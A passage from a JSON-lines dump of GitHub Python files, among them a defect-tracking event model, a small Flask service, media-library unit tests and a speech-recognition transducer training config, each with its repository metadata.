DEFECT_AMENDED:\n return self._on_amended(event)\n if event['event_type'] == DEFECT_REOPENED:\n return self._on_reopened(event)\n if event['event_type'] == DEFECT_CLOSED:\n return self._on_closed(event)\n if event['event_type'] == DEFECT_DELETED:\n return self._on_deleted(event)\n if event['event_type'] == DEFECT_LOCKED:\n return self._on_locked(event)\n \n def amend(self, user, timestamp, **kwargs):\n self.assert_not_locked()\n self.assert_valid(timestamp)\n if self.status != \"Open\":\n raise Exception(\"Defect must be in open state to amend.\")\n event = self._create_event(DEFECT_AMENDED, kwargs, user, timestamp)\n self.apply(event)\n return event\n \n def close(self, user, release_id, reason, timestamp):\n self.assert_not_locked()\n self.assert_valid(timestamp)\n if self.status == \"Closed\":\n raise Exception(\"Defect is already closed.\")\n data = {\n 'release_id': release_id,\n 'reason': reason\n }\n event = self._create_event(DEFECT_CLOSED, data, user, timestamp)\n self.apply(event)\n return event;\n \n def reopen(self, user, release_id, reason, timestamp):\n self.assert_not_locked()\n self.assert_valid(timestamp)\n if self.status != \"Closed\":\n raise Exception(\"Defect must be in closed state to reopen.\")\n data = {\n 'release_id': release_id,\n 'reason': reason\n }\n event = self._create_event(DEFECT_REOPENED, data, user, timestamp)\n self.apply(event)\n return event\n \n def soft_delete(self, user, timestamp):\n self.assert_not_locked()\n self.assert_valid(timestamp)\n if self.status != \"Closed\":\n raise Exception(\"Defect must be in closed state to delete.\")\n event = self._create_event(DEFECT_DELETED, {}, user, timestamp)\n self.apply(event)\n return event\n \n def make_obsolete(self, user, reason, timestamp):\n self.assert_not_locked()\n assert(reason != '')\n self.assert_valid(timestamp)\n if self.status != \"Closed\":\n raise Exception(\"Defect must first be closed to make obsolete.\")\n event = self._create_event(DEFECT_LOCKED, { 'reason': reason }, user, timestamp)\n self.apply(event)\n return event\n \n def _create_event(self, event_type, dictionary, user, created):\n return {\n 'timestamp': created,\n 'sequence_nr': self.last_sequence_nr + 1,\n 'aggregate_id': self.id,\n 'aggregate_type': 'DEFECT',\n 'event_type': event_type,\n 'payload': dictionary,\n 'owner': {\n 'username': user.username,\n 'email': user.email\n }\n }\n \n @property\n def is_active(self):\n return self.status == \"Open\"\n \n @property\n def is_locked(self):\n return self.locked\n \n def assert_not_locked(self):\n if self.locked:\n raise Exception(\"Defect is obsolete and can no longer be modified.\")\n \n def assert_valid(self, datetime):\n assert_datetime(datetime)\n last_date = self.change_history[0].date_created\n if last_date > datetime:\n raise Exception(\"datetime specified is earlier than latest change\")\n \n def _add_changeset_defect_closed(self, event):\n payload = event['payload'] \n description = \"Defect closed.\"\n description += \"\\nVersion: %s\" % payload['release_id']\n if payload['reason'] != \"\":\n description += \"\\nReason: \\\"%s\\\"\" % payload['reason']\n ch = self._add_changeset(event, description)\n \n def _add_changeset_defect_reopened(self, event):\n payload = event['payload']\n description = \"Defect has been reopened.\"\n description += \"\\nVersion: %s\" % payload['release_id']\n if payload['reason'] != \"\":\n description += \"\\nReason: \\\"%s\\\"\" % payload['reason']\n ch = self._add_changeset(event, description)\n \n def _add_changeset_defect_locked(self, event):\n payload = event['payload']\n description = \"Defect has been made obsolete.\"\n description += \"\\nReason: \\\"%s\\\"\" % payload['reason']\n ch = self._add_changeset(event, description)\n\n def _add_changeset_defect_amended(self, event):\n ch = self._add_changeset(event, \"Defect has been updated.\")\n \n def _create_changeset_defect_opened(self, event):\n ch = self._add_changeset(event, \"New defect created.\")\n \n def _create_changeset_defect_imported(self, event):\n ch = self._add_changeset(event, \"New defect imported.\")\n \n def _add_changeset(self, event, description):\n ch = ChangeHistory()\n ch.date_created = event['timestamp']\n ch.submitter = event['owner']\n ch.description = description\n self.change_history.insert(0, ch)\n \n def _replay_from(self, defect_events):\n for event in defect_events:\n self.last_sequence_nr += 1\n sequence_nr = event['sequence_nr']\n if (sequence_nr != self.last_sequence_nr):\n error = \"id {}: sequence_nr {}, expected {}\".format(\n event['aggregate_id'],\n sequence_nr,\n self.last_sequence_nr\n )\n raise AssertionError(error)\n self.apply(event)\n \n def _on_imported(self, event):\n self._create_changeset_defect_imported(event)\n self.id = event['aggregate_id']\n self.submitter = event['owner']\n self.date_created = event['timestamp']\n self.status = 'Open'\n self._set_properties(event)\n\n def _on_opened(self, event):\n self._create_changeset_defect_opened(event)\n self.id = event['aggregate_id']\n self.submitter = event['owner']\n self.date_created = event['timestamp']\n self.status = 'Open'\n self._set_properties(event)\n \n def _on_closed(self, event):\n self._add_changeset_defect_closed(event)\n self.status = 'Closed'\n self.release_id = event['payload']['release_id']\n \n def _on_reopened(self, event):\n self._add_changeset_defect_reopened(event) \n self.status = 'Open'\n self.release_id = event['payload']['release_id']\n \n def _on_amended(self, event):\n self._add_changeset_defect_amended(event) \n self._set_properties(event)\n \n def _on_deleted(self, event):\n self.status = 'Deleted'\n \n def _on_locked(self, event):\n self._add_changeset_defect_locked(event)\n self.locked = True\n self.status = 'Obsolete'\n \n def _set_properties(self, event):\n payload = event['payload']\n self.project_code = payload['project_code']\n self.release_id = payload['release_id']\n self.priority = payload['priority']\n self.reference = payload['reference']\n self.description = payload['description']\n self.comments = payload['comments']\n","repo_name":"nevtum/hivemind","sub_path":"src/defects/domain/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29827351816","text":"from flask import Flask, request\nimport os.path\nimport requests\n\napp = Flask(__name__)\n\n\n@app.route('/calculate', methods=['POST'])\ndef calculate():\n input_data = request.json\n if \"file\" in input_data and \"product\" in input_data and input_data[\"file\"] is not None and input_data[\"product\"] is not None:\n file = input_data[\"file\"]\n if os.path.isfile(\"host_vol/\"+file):\n response = requests.post(\"http://flask2:6003/calculate\", json=input_data)\n return response.json()\n return {\"file\": file, \"error\": \"File not found.\"}, 404\n\n return {\"file\": None, \"error\": \"Invalid JSON input.\"}, 404\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=6000, debug=True)","repo_name":"shubham101096/cloud","sub_path":"A1/flask1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32628403032","text":"import csv\n\ndef get_pageinfo(path):\n page_list=[]\n page_dict={}\n data=csv.reader(open(path,'r'))\n for info in data:\n page_list.append(info)\n page_dict=dict(page_list)\n return page_dict\nif __name__=='__main__':\n re=get_pageinfo(r'.\\PageMsg.csv')\n for i in re:\n print(i,re[i])\n\n\n","repo_name":"hblovey/sandy-git-test","sub_path":"XIAOMI/Pageinfo.py","file_name":"Pageinfo.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41409318919","text":"import os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\ndef storage(args):\n\tsize = 0\n\tfile = os.listdir('%s/warehouse/%s/'%(BASE_DIR,args))\n\tfor i in file:\n\t\tfile_size = os.path.getsize('%s/warehouse/%s/%s'%(BASE_DIR,args,i))\n\t\tsize+=file_size\n\treturn size\n\n\n\n","repo_name":"WuAlin0327/python3-notes","sub_path":"网络编程/FTP程序/服务端/bin/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"29922131160","text":"import json, re\nfrom modules.http_request import HttpRequests\n\nclass NGModel:\n @staticmethod\n def fetch_nagtas_storage_data():\n url = 'https://ir.eia.gov/ngs/wngsr.json'\n response = HttpRequests.get(url)\n try:\n data = json.loads(re.sub('', '', response.text))\n except json.decoder.JSONDecodeError:\n # The response is not a valid JSON object\n print(\"Error: the server did not return a valid JSON object\")\n return data","repo_name":"peter-oroszvari/eia_bot","sub_path":"eia/ng_storage_report_model.py","file_name":"ng_storage_report_model.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27675045098","text":"import sys\nfrom PyQt5.QtWidgets import QMessageBox, QApplication\n\nclass SlotStat(QMessageBox):\n def __init__(self):\n super(QMessageBox,self).__init__()\n\n self.setWindowTitle(\"Valid Value\")\n self.setText(\" VALID VALUE status \\n\\n\"\n \"• complete \\n\\n\"\n \"• ongoing \\n\\n\"\n \"• to be done\")\n\n self.setIcon(QMessageBox.Information)\nx = SlotStat()\ndef slot_stat():\n global x\n return x.show()\n","repo_name":"a-graziano/PreEx-Builder","sub_path":"msgBox/SlotStat.py","file_name":"SlotStat.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"18005323560","text":"import unittest\nimport datetime\nimport os\n\nfrom ..tools import sandbox\nfrom ...models import library\n\nclass LibraryTests(unittest.TestCase):\n def setUp(self):\n # Create a sandbox in a temporary (safe) directory\n self.sandbox = sandbox.Sandbox()\n self.sandbox.create()\n\n # Add unique files to each 'Videos' library\n self.unique_source_files = self.sandbox.populate_library_with_unique_media(self.sandbox.source_videos_library)\n self.unique_backup_files = self.sandbox.populate_library_with_unique_media(self.sandbox.backup_videos_library)\n \n # Add matching files to both 'Videos' library\n self.matching_source_files, self.matching_backup_files = self.sandbox.populate_libraries_with_identical_media(\n self.sandbox.source_videos_library,\n self.sandbox.backup_videos_library\n )\n\n def tearDown(self):\n self.sandbox.destroy()\n\n def test_init_source_videos_library(self):\n LibraryTestMethods().init_library(self.sandbox.source_videos_library)\n\n def test_init_source_music_library(self):\n LibraryTestMethods().init_library(self.sandbox.source_music_library)\n\n def test_init_backup_videos_library(self):\n LibraryTestMethods().init_library(self.sandbox.backup_videos_library)\n\n def test_init_backup_music_library(self):\n LibraryTestMethods().init_library(self.sandbox.backup_music_library)\n\n def test_load_all_from_source_videos_library(self):\n media_in_library = self.unique_source_files + self.matching_source_files\n LibraryTestMethods().load_all_media(self.sandbox.source_videos_library, media_in_library)\n\n def test_load_all_from_backup_videos_library(self):\n media_in_library = self.unique_backup_files + self.matching_backup_files\n LibraryTestMethods().load_all_media(self.sandbox.backup_videos_library, media_in_library)\n\n def test_copy_new_media_to_source_video_library(self):\n LibraryTestMethods().copy_new_media(\n self.sandbox.source_videos_library,\n self.sandbox.backup_videos_library\n )\n\n def test_copy_new_media_to_backup_video_library(self):\n LibraryTestMethods().copy_new_media(\n self.sandbox.backup_videos_library,\n self.sandbox.source_videos_library\n )\n\n def test_copy_existing_media_to_source_video_library(self):\n LibraryTestMethods().copy_existing_media(\n self.sandbox.source_videos_library,\n self.sandbox.backup_videos_library\n )\n\n def test_copy_existing_media_to_backup_video_library(self):\n LibraryTestMethods().copy_existing_media(\n self.sandbox.backup_videos_library,\n self.sandbox.source_videos_library\n )\n\n def test_delete_media_from_source_video_library(self):\n LibraryTestMethods().delete_media(self.sandbox.source_videos_library)\n \n def test_delete_media_from_backup_video_library(self):\n LibraryTestMethods().delete_media(self.sandbox.backup_videos_library)\n\n def test_ignore_txt_in_source_video_library(self):\n file_path = self.sandbox.make_media(\n 'ignore_me.txt',\n 'foo',\n self.sandbox.source_videos_library\n )\n LibraryTestMethods().ignored_file_extensions(\n self.sandbox.source_videos_library,\n file_path\n )\n\n def test_ignore_txt_in_backup_video_library(self):\n file_path = self.sandbox.make_media(\n 'ignore_me.txt',\n 'foo',\n self.sandbox.backup_videos_library\n )\n LibraryTestMethods().ignored_file_extensions(\n self.sandbox.backup_videos_library,\n file_path\n )\n\nclass LibraryTestMethods(unittest.TestCase):\n # Re-usable methods\n\n def init_library(self, mock_library: sandbox.MockLibrary):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # Assert default properties are as expected\n self.assertEqual(library_object.name, mock_library.name)\n self.assertEqual(library_object.path, mock_library.path)\n self.assertEqual(library_object.source, mock_library.source)\n self.assertEqual(len(library_object.media), 0)\n\n def load_all_media(self, mock_library: sandbox.MockLibrary, media_in_library: list):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # Load all media and assert all media were found\n self.assertTrue(library_object.load_all_media(callback_on_progress=None))\n self.assertEqual(len(media_in_library), len(library_object.media))\n\n # Load all media again; assert the library's list of media did not change\n library_object.load_all_media(False)\n self.assertEqual(len(media_in_library), len(library_object.media))\n\n # Assert all files were init'd properly\n for media_name in library_object.media:\n # Assert the MediaFile 'path' is the absolute path to the file\n self.assertTrue(library_object.media[media_name].path in [item.path for item in media_in_library])\n\n # Assert the MediaFile 'path_in_library' is the relative path to the file (relative to the library)\n # Note: this is the same code used in the current Library().load_all_media() method\n path_in_library = library_object.media[media_name].path.replace(\n library_object.path + os.sep, ''\n )\n self.assertEqual(library_object.media[media_name].path_in_library, path_in_library)\n\n # Assert the MediaFile 'source' is equal to the Library 'source'\n self.assertEqual(library_object.media[media_name].source, library_object.source)\n\n # Remove the video from video_list for the next 'for' iteration\n # to prove the same media is not returned more than once\n media_in_library.remove(list(filter(lambda x: x.name == media_name, media_in_library))[0])\n\n def copy_new_media(self, target_mock_library: sandbox.MockLibrary, other_mock_library: sandbox.MockLibrary):\n # Make a pair of Library objects\n target_library_object = library.Library(target_mock_library.name, target_mock_library.path, target_mock_library.source)\n other_library_object = library.Library(other_mock_library.name, other_mock_library.path, other_mock_library.source)\n\n # Load the Library objects\n target_library_object.load_all_media(callback_on_progress=None)\n other_library_object.load_all_media(callback_on_progress=None)\n\n original_target_media_count = len(target_library_object.media)\n\n # Copy media to 'target' that only exist in 'other'\n # Assert each Library.copy_media() action creates a new MediaFile object in the 'target' library\n copy_count = 0\n for media_name in other_library_object.media:\n if media_name not in target_library_object.media:\n copy_count += 1\n self.assertTrue(\n target_library_object.copy_media(\n other_library_object.media[media_name].path,\n other_library_object.media[media_name].path_in_library,\n other_library_object.media[media_name].real_checksum\n ).success\n )\n\n # Assertions\n self.assertTrue(media_name in target_library_object.media)\n self.assertEqual(\n target_library_object.media[media_name].path_in_library,\n other_library_object.media[media_name].path_in_library\n )\n self.assertTrue(os.path.exists(target_library_object.media[media_name].path))\n self.assertEqual(\n target_library_object.media[media_name].real_checksum,\n other_library_object.media[media_name].real_checksum\n )\n self.assertNotEqual(\n target_library_object.media[media_name].cache_file,\n other_library_object.media[media_name].cache_file\n )\n self.assertEqual(\n target_library_object.media[media_name].cached_checksum,\n other_library_object.media[media_name].cached_checksum\n )\n self.assertEqual(\n target_library_object.media[media_name].cached_date,\n str(datetime.date.today())\n )\n # Verify the above 'for' loop actually copied something\n # Sandbox.populate_library_with_unique_media() adds 12 files\n self.assertEqual(copy_count, 12) # If this fails, the whole test was a dud\n self.assertEqual(len(target_library_object.media), original_target_media_count + copy_count)\n\n def copy_existing_media(self, target_mock_library: sandbox.MockLibrary, other_mock_library: sandbox.MockLibrary):\n # Make a pair of Library objects\n target_library_object = library.Library(target_mock_library.name, target_mock_library.path, target_mock_library.source)\n other_library_object = library.Library(other_mock_library.name, other_mock_library.path, other_mock_library.source)\n\n # Load the Library objects\n target_library_object.load_all_media(False)\n other_library_object.load_all_media(False)\n\n original_target_media_count = len(target_library_object.media)\n\n # Attempt to copy media from 'other' that already exists on the 'target'\n # Assert the file is /not/ copied\n copy_count = 0\n for media_name in other_library_object.media:\n if media_name in target_library_object.media:\n copy_count += 1\n target_file_last_modified = os.path.getmtime(target_library_object.media[media_name].path)\n self.assertFalse(\n target_library_object.copy_media(\n other_library_object.media[media_name].path,\n other_library_object.media[media_name].path_in_library,\n other_library_object.media[media_name].real_checksum\n ).success\n )\n self.assertTrue(media_name in target_library_object.media)\n self.assertTrue(os.path.exists(target_library_object.media[media_name].path))\n self.assertEqual(\n target_file_last_modified,\n os.path.getmtime(target_library_object.media[media_name].path)\n )\n\n self.assertEqual(len(target_library_object.media), original_target_media_count)\n\n def delete_media(self, mock_library):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # Load the library; assert media were actually found\n library_object.load_all_media(False)\n self.assertEqual(len(library_object.media), 18)\n\n # Generate a cache file for each media in the library\n media_items = []\n for media_name in library_object.media:\n media_items.append((\n media_name,\n library_object.media[media_name].path\n ))\n library_object.media[media_name].cached_checksum\n self.assertTrue(os.path.exists(library_object.media[media_name].cache_file))\n\n # Delete each media and perform assertions\n for media_name, media_path in media_items:\n media_cache_path = library_object.media[media_name].cache_file\n library_object.delete_media(media_name)\n self.assertFalse(os.path.exists(media_path))\n self.assertFalse(os.path.exists(media_cache_path))\n self.assertFalse(media_name in library_object.media)\n\n self.assertEqual(len(library_object.media), 0)\n\n def ignored_file_extensions(self, mock_library, file_to_ignore):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # For sanity purposes, make sure the 'file_to_ignore' actually exists under the library\n self.assertTrue(os.path.exists(file_to_ignore.path))\n self.assertIn(library_object.path, file_to_ignore.path)\n\n # Load the library; assert the 'file_to_ignore' was not loaded\n library_object.load_all_media(False)\n self.assertEqual(len(library_object.media), 18)\n self.assertNotIn(\n file_to_ignore.name,\n library_object.media\n )\n","repo_name":"Jack-Edwards/media-backup","sub_path":"tests/models/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":12711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13153728335","text":"import icdiff\nimport numpy as np\n\nfrom ctc_decoding.huggingface_ctc_decoding import (\n HFCTCGreedyDecoder,\n)\nfrom ml4audio.text_processing.asr_metrics import calc_cer\n\nTARGET_SAMPLE_RATE = 16000\n\n\ndef test_GreedyDecoder(\n hfwav2vec2_base_tokenizer,\n librispeech_logtis_file,\n librispeech_ref,\n):\n logits = np.load(librispeech_logtis_file, allow_pickle=True)\n decoder = HFCTCGreedyDecoder(\n tokenizer_name_or_path=\"facebook/wav2vec2-base-960h\",\n ).build()\n transcript = decoder.ctc_decode(logits.squeeze())[0]\n hyp = transcript.text\n\n cer = calc_cer([librispeech_ref], [hyp])\n assert cer == 0.0\n","repo_name":"SELMA-project/ml4audio","sub_path":"ctc-decoding/tests/test_greedy_decoding.py","file_name":"test_greedy_decoding.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"86"} +{"seq_id":"30900524572","text":"import os\n\nfrom sisyphus import gs, tk\n\nimport i6_core.rasr as rasr\n\nimport i6_experiments.common.setups.rasr.gmm_system as gmm_system\nimport i6_experiments.common.setups.rasr.util as rasr_util\n\nfrom i6_experiments.users.berger.systems.transducer_system import TransducerSystem\nfrom i6_experiments.users.berger.args.jobs.hybrid_args import get_nn_args\nfrom i6_experiments.users.berger.args.jobs.search_types import SearchTypes\nfrom i6_experiments.users.berger.network.models.context_1_transducer import (\n get_viterbi_transducer_alignment_config,\n make_context_1_blstm_transducer_blank,\n make_context_1_blstm_transducer_fullsum,\n make_context_1_blstm_transducer_recog,\n pretrain_construction_algo,\n)\nfrom i6_experiments.users.berger.corpus.sms_wsj.data import get_data_inputs\nfrom i6_experiments.users.berger.args.jobs.rasr_init_args import get_init_args\nfrom i6_experiments.users.berger.args.jobs.data import get_returnn_rasr_data_inputs\nfrom i6_experiments.users.berger.args.returnn.learning_rates import (\n LearningRateSchedules,\n)\nfrom i6_core.returnn.config import CodeWrapper\n\n\n# ********** Settings **********\n\ndir_handle = os.path.dirname(__file__).split(\"config/\")[1]\nfilename_handle = os.path.splitext(os.path.basename(__file__))[0][len(\"config_\") :]\ngs.ALIAS_AND_OUTPUT_SUBDIR = f\"{dir_handle}/{filename_handle}/\"\nrasr.flow.FlowNetwork.default_flags = {\"cache_mode\": \"task_dependent\"}\n\ntrain_key = \"train_si284\"\ndev_key = \"cv_dev93\"\ntest_key = \"test_eval92\"\n\ncv_segments = tk.Path(\"/work/asr4/berger/dependencies/sms_wsj/segments/cv_dev93_16kHz.reduced\")\n\n# Original WER: 4.3\n# viterbi_model = tk.Path(\n# \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/returnn/rasr_training/ReturnnRasrTrainingJob.DzUlhFloyCtK/output/models/epoch.240.index\"\n# )\n# Original WER: 3.3\nviterbi_model = tk.Path(\n \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/returnn/rasr_training/ReturnnRasrTrainingJob.i17PIYLSFkbp/output/models/epoch.230.meta\"\n)\ntrain_alignment = tk.Path(\n \"/work/asr4/berger/dependencies/sms_wsj/alignment/16kHz/train_si284_gmm/alignment.cache.bundle\"\n)\ndev_alignment = tk.Path(\"/work/asr4/berger/dependencies/sms_wsj/alignment/16kHz/cv_dev93_gmm/alignment.cache.bundle\")\n\ngmm_allophones = tk.Path(\n \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/lexicon/allophones/StoreAllophonesJob.74FPxuoluGhv/output/allophones\"\n)\nctc_allophones = tk.Path(\n \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/lexicon/allophones/StoreAllophonesJob.KIW6XeiDZx8T/output/allophones\"\n)\n\nfrequency = 16\n\nf_name = \"gt\"\n\nnum_inputs = 50\nnum_classes = 87\n\n\ndef run_exp(**kwargs):\n max_pool = kwargs.get(\"max_pool\", [1, 2, 2])\n red_fact = 1\n for p in max_pool:\n red_fact *= p\n\n am_args = {\n \"state_tying\": \"monophone-eow\",\n \"states_per_phone\": 1,\n # \"phon_history_length\": 0,\n # \"phon_future_length\": 0,\n \"tdp_scale\": 1.0,\n \"tdp_transition\": (0.0, 0.0, \"infinity\", 0.0),\n \"tdp_silence\": (0.0, 0.0, \"infinity\", 0.0),\n }\n\n # ********** Init args **********\n\n train_data_inputs, dev_data_inputs, test_data_inputs = get_data_inputs(\n train_keys=[train_key],\n dev_keys=[dev_key],\n test_keys=[test_key],\n freq=frequency,\n lm_name=\"64k_3gram\",\n recog_lex_name=\"nab-64k\",\n delete_empty_orth=False,\n )\n init_args = get_init_args(sample_rate_kHz=frequency)\n init_args.feature_extraction_args = {\n f_name: init_args.feature_extraction_args[f_name]\n } # only keep fname and discard other features\n\n feature_system = gmm_system.GmmSystem(rasr_binary_path=None)\n feature_system.init_system(\n rasr_init_args=init_args,\n train_data=train_data_inputs,\n dev_data=dev_data_inputs,\n test_data=test_data_inputs,\n )\n feature_system.run([\"extract\"])\n\n # ********** Data inputs **********\n\n nn_data_inputs = get_returnn_rasr_data_inputs(\n train_data_inputs=train_data_inputs,\n cv_data_inputs=dev_data_inputs,\n dev_data_inputs=dev_data_inputs,\n test_data_inputs=test_data_inputs,\n train_cv_pairing=[(train_key, dev_key)],\n feature_flows=feature_system.feature_flows,\n feature_caches=feature_system.feature_caches,\n am_args=am_args,\n train_alignment=train_alignment,\n cv_alignment=dev_alignment,\n cv_segments=cv_segments,\n allophone_file=gmm_allophones,\n )\n\n # ********** Transducer System **********\n\n name = \"_\".join(filter(None, [\"BLSTM_transducer\", kwargs.get(\"name_suffix\", \"\")]))\n\n train_networks = {}\n recog_networks = {}\n\n l2 = kwargs.get(\"l2\", 5e-06)\n dropout = kwargs.get(\"dropout\", 0.1)\n train_blstm_net, train_python_code = make_context_1_blstm_transducer_fullsum(\n num_outputs=num_classes,\n compress_joint_input=kwargs.get(\"compressed_join\", False),\n specaug_args={\n \"max_time_num\": 3,\n \"max_time\": 15,\n \"max_feature_num\": 5,\n \"max_feature\": 5,\n },\n blstm_args={\n \"max_pool\": max_pool,\n \"l2\": l2,\n \"dropout\": dropout,\n \"size\": 400,\n },\n decoder_args={\n \"combination_mode\": \"concat\",\n \"dec_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_dec_layers\", 2),\n \"size\": 800,\n \"l2\": l2,\n \"dropout\": dropout,\n },\n \"joint_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_joint_layers\", 1),\n \"size\": 600,\n \"l2\": l2,\n \"dropout\": dropout,\n },\n },\n )\n\n train_networks[name] = train_blstm_net\n\n recog_blstm_net, recog_python_code = make_context_1_blstm_transducer_recog(\n num_outputs=num_classes,\n blstm_args={\n \"max_pool\": max_pool,\n \"size\": 400,\n },\n decoder_args={\n \"combination_mode\": \"concat\",\n \"dec_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_dec_layers\", 2),\n \"size\": 800,\n },\n \"joint_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_joint_layers\", 1),\n \"size\": 600,\n },\n },\n )\n\n recog_networks[name] = recog_blstm_net\n\n alignment_config = get_viterbi_transducer_alignment_config(red_fact)\n\n num_subepochs = kwargs.get(\"num_subepochs\", 240)\n\n nn_args = get_nn_args(\n train_networks=train_networks,\n recog_networks=recog_networks,\n num_inputs=num_inputs,\n num_outputs=num_classes,\n num_epochs=num_subepochs,\n search_type=SearchTypes.LabelSyncSearch,\n returnn_train_config_args={\n \"extra_python\": train_python_code,\n \"batch_size\": kwargs.get(\"batch_size\", 15000),\n \"accum_grad\": kwargs.get(\"accum_grad\", 1),\n \"grad_noise\": kwargs.get(\"grad_noise\", 0.0),\n \"grad_clip\": kwargs.get(\"grad_clip\", 100.0),\n \"schedule\": kwargs.get(\"schedule\", LearningRateSchedules.OCLR),\n \"peak_lr\": kwargs.get(\"peak_lr\", 1e-5),\n \"const_lr\": kwargs.get(\"const_lr\", 1e-5),\n \"learning_rate\": kwargs.get(\"learning_rate\", 1e-05),\n \"min_learning_rate\": 1e-06,\n \"n_steps_per_epoch\": kwargs.get(\"n_steps_per_epoch\", 1100),\n \"use_chunking\": False,\n \"extra_config\": {\n \"preload_from_files\": {\n \"base\": {\n \"init_for_train\": True,\n \"ignore_missing\": True,\n \"filename\": viterbi_model,\n }\n },\n \"train\": {\"reduce_target_factor\": red_fact},\n \"dev\": {\"reduce_target_factor\": red_fact},\n },\n },\n returnn_recog_config_args={\n \"extra_python\": recog_python_code,\n },\n train_args={\"partition_epochs\": 3, \"extra_rasr_config\": alignment_config},\n prior_args={\n \"num_classes\": num_classes,\n \"use_python_control\": False,\n \"extra_rasr_config\": alignment_config,\n \"mem_rqmt\": 6.0,\n },\n recog_args={\n \"epochs\": [num_subepochs] if kwargs.get(\"recog_final_epoch_only\", False) else None,\n \"lm_scales\": kwargs.get(\"lm_scales\", [0.6]),\n \"prior_scales\": kwargs.get(\"prior_scales\", [0.0]),\n \"use_gpu\": True,\n \"label_unit\": \"phoneme\",\n \"add_eow\": True,\n \"allow_blank\": True,\n \"allow_loop\": False,\n \"blank_penalty\": kwargs.get(\"blank_penalty\", 0.0),\n \"recombination_limit\": 1,\n \"label_scorer_type\": \"tf-ffnn-transducer\",\n \"lp\": 15.0,\n \"label_scorer_args\": {\n \"use_prior\": False,\n \"num_classes\": num_classes,\n \"extra_args\": {\n \"blank_label_index\": 0,\n \"context_size\": 1,\n \"max_batch_size\": 256,\n \"reduction_factors\": red_fact,\n \"use_start_label\": True,\n \"start_label_index\": num_classes,\n \"transform_output_negate\": True,\n },\n },\n \"label_tree_args\": {\n \"use_transition_penalty\": False,\n \"skip_silence\": True,\n },\n },\n )\n\n nn_steps = rasr_util.RasrSteps()\n nn_steps.add_step(\"nn\", nn_args)\n nn_steps.add_step(\"nn_recog\", nn_args)\n\n system = TransducerSystem(rasr_binary_path=None)\n system.init_system(\n rasr_init_args=init_args,\n train_data=nn_data_inputs[\"train\"],\n cv_data=nn_data_inputs[\"cv\"],\n dev_data=nn_data_inputs[\"dev\"],\n test_data=nn_data_inputs[\"test\"],\n train_cv_pairing=[(f\"{train_key}.train\", f\"{train_key}.cv\")],\n )\n\n system.run(nn_steps)\n\n\ndef py():\n # OCLR\n # Peak-lr WER\n # 5e-06 4.5\n # 1e-05 4.7\n # 2e-05 4.7\n # -> No improvements\n # Min/Ep: 17 at 5k Batch size\n if False:\n for peak_lr in [5e-06, 1e-05, 2e-05]:\n name_suffix = f\"oclr-{peak_lr}_pool-4\"\n run_exp(\n name_suffix=name_suffix,\n schedule=LearningRateSchedules.OCLR,\n peak_lr=peak_lr,\n max_pool=[1, 2, 2],\n lm_scales=[0.6],\n recog_final_epoch_only=False,\n )\n\n # compressed input\n # Batch WER Min/Ep\n # 5000 4.7 14\n # 7500 4.8 12\n # 15000 4.8 10\n if False:\n for batch_size, accum_grad, n_steps_per_epoch in [\n (5000, 3, 3100),\n (7500, 2, 2000),\n (15000, 1, 1100),\n ]:\n name_suffix = f\"oclr-{peak_lr}_pool-4_compress-joint_bs-{batch_size}\"\n run_exp(\n name_suffix=name_suffix,\n schedule=LearningRateSchedules.OCLR,\n peak_lr=1e-05,\n max_pool=[1, 2, 2],\n lm_scales=[0.6],\n compressed_join=True,\n batch_size=batch_size,\n accum_grad=accum_grad,\n n_steps_per_epoch=n_steps_per_epoch,\n recog_final_epoch_only=False,\n )\n\n # Default parameters change here:\n # Viterbi model WER 4.3 -> 3.7, Dec-size 640 -> 800, Joint-size 1024 -> 600\n\n # Adapted learning rate schedule -> Const into decay\n if True:\n for const_lr in [5e-06, 8e-06, 1e-05, 3e-05, 5e-05, 7e-05, 9e-05, 1e-04, 3e-04]:\n name_suffix = f\"const_decay-{const_lr}_pool-4\"\n run_exp(\n name_suffix=name_suffix,\n schedule=LearningRateSchedules.CONST_DECAY,\n compressed_join=True,\n batch_size=15000,\n accum_grad=1,\n n_steps_per_epoch=1100,\n const_lr=const_lr,\n max_pool=[1, 2, 2],\n lm_scales=[0.6],\n recog_final_epoch_only=False,\n 